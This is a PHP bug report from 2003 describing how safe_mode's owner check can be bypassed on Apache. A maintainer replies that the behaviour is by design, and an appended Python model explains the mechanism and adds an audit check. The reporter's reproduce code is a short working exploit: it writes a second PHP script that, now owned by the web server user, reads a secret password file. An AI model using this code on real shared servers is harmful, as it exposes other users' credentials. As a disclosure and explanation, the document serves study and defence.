Bug #25149 safe_mode bypass
Submitted: 2003-08-19 11:15 UTC Modified: 2003-08-19 11:18 UTC
From: marrtins at hackers dot lv Assigned:
Status: Not a bug Package: Scripting Engine problem
PHP Version: 4.3.1 OS: Linux
Private report: No CVE-ID: None
 [2003-08-19 11:15 UTC] marrtins at hackers dot lv
Description:
------------
apache_1.3.27
httpd.conf
----------
User webmaster
Group nobody

./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite

======================================
php-4.3.0
php.ini
---------
safe_mode               =       On

./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/

======================================

~/public_html> ls -al *
drwxr-xr-x    3 test     users        4096 aug 19 19:05 .
drwx--x--x    5 test     users        4096 aug 19 19:04 ..
-rw-r--r--    1 test     users         146 aug 19 18:47 hack.php
drwxrwxrwx    2 test     users        4096 aug 19 19:03 test

After accessing http://some_server/~test/hack.php, PHP creates test/stole.php:

~/public_html> ls -al test
drwxrwxrwx    2 test     users        4096 aug 19 19:07 .
drwxr-xr-x    3 test     users        4096 aug 19 19:05 ..
-rw-r--r--    1 webmaste nobody         61 aug 19 19:07 stole.php

After that, http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php, which is owned by webmaster.

Reproduce code:
---------------
<?php
  // Runs as a script owned by "test"; safe_mode permits the write because
  // the target directory test/ is owned by "test". The new file is created
  // by the httpd process, so it ends up owned by the "webmaster" user.
  $data = '<?php $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>';
  $f = fopen('/home/test/public_html/test/stole.php', 'w');
  fwrite($f, $data);
  fclose($f);
?>

 [2003-08-19 11:18 UTC] iliaa@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

This is how safe_mode works.
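The mechanism behind the report and this reply, as an added Python model that is not code from the report or from PHP itself: safe_mode compares the owner of the running script with the owner of the target file (or, for a file being created, of its parent directory), while any file a script creates is owned by the httpd user. The paths and owners are the ones in the listings above; the check is a simplified model of the engine's owner comparison, and the last function is the audit a server operator would run to find files under a user's public_html that the web server user owns.

```python
import posixpath

# Constructed model of the report's setup: path -> owning user.
# Owners are taken from the ls listings and httpd.conf in the report.
WEB_USER = "webmaster"                       # "User webmaster" in httpd.conf
INITIAL_FS = {
    "/home/test/public_html": "test",
    "/home/test/public_html/hack.php": "test",
    "/home/test/public_html/test": "test",   # drwxrwxrwx, world-writable
    "/www/secret": WEB_USER,
    "/www/secret/pass.inc.php": WEB_USER,
}

def safe_mode_allows(fs, script, target):
    """safe_mode's owner check (simplified): the owner of the running script
    must own the target file, or, if the target does not exist yet, its
    parent directory."""
    owner = fs[script]
    if target in fs:
        return fs[target] == owner
    return fs.get(posixpath.dirname(target)) == owner

def script_writes(fs, script, target):
    """A script creates target. The check passes on the parent directory,
    but the file is written by the httpd process, so it is owned by WEB_USER."""
    if not safe_mode_allows(fs, script, target):
        raise PermissionError(f"safe_mode: {script} may not write {target}")
    fs[target] = WEB_USER

def server_owned_files_in_user_dirs(fs):
    """Audit check: files under a user's public_html owned by the web server
    user were written by PHP, not by the user, and will pass the owner check
    against anything else the server user owns."""
    return sorted(p for p, o in fs.items()
                  if o == WEB_USER and "/public_html/" in p)

def simulate():
    """Replay the report's sequence on the model and return the outcomes."""
    fs = dict(INITIAL_FS)
    hack = "/home/test/public_html/hack.php"
    stole = "/home/test/public_html/test/stole.php"
    secret = "/www/secret/pass.inc.php"
    direct = safe_mode_allows(fs, hack, secret)     # False: test != webmaster
    script_writes(fs, hack, stole)                  # allowed: dir owned by test
    indirect = safe_mode_allows(fs, stole, secret)  # True: both owned by webmaster
    return {"direct_read_allowed": direct,
            "stole_owner": fs[stole],
            "indirect_read_allowed": indirect,
            "audit_findings": server_owned_files_in_user_dirs(fs)}
```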